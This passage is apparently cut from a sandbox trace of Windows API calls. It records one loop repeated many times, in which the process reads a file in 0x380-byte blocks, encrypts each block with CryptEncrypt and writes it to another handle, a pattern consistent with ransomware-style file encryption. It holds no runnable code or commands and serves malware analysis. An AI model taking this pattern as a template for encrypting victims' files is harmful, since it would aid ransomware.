nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.636] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.636] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.636] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.636] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.637] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.637] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.637] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.637] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.637] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.637] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.637] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.638] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.638] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.638] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.638] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.638] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.638] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.638] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.639] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.639] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.639] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.639] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.639] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.640] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.640] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.640] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.640] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.640] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.640] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.640] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.640] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.640] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.640] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.640] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.640] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.640] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.641] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.641] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.641] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.641] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.641] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.641] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.642] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.642] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.642] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.642] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.642] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.642] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.642] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.642] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.642] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.642] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.642] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.643] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.643] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.643] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.643] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 